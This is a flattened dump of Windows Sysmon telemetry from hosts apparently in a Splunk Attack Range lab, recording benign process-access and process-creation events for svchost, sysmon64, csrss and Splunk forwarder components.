AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49522-false10.0.1.12-8000- 23542300x8000000000000000103467Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:31.498{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36D5CBE17C0456CD7D4F220AEACCC4F3,SHA256=2E4F6A4B942AADB515D058EDB74722D327E288DCC10192E7297AB0C603BFB4F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081345Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.992{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B247-615A-4301-00000000FD01}784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081344Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081343Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081342Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081341Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081340Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081339Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081338Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081337Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081336Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081335Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.992{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B247-615A-4301-00000000FD01}784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081334Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.992{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B247-615A-4301-00000000FD01}784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081333Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.993{2FDD8D40-B247-615A-4301-00000000FD01}784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000081332Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.492{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B247-615A-4201-00000000FD01}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081331Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081330Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081329Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081328Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081327Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081326Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081325Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081324Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081323Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.492{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B247-615A-4201-00000000FD01}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081322Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081321Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.492{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B247-615A-4201-00000000FD01}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081320Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.493{2FDD8D40-B247-615A-4201-00000000FD01}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 